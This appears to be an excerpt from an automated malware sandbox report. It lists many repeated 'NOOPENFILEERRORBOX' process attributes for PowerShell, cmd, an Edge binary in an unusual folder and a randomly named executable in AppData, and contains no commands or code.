                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
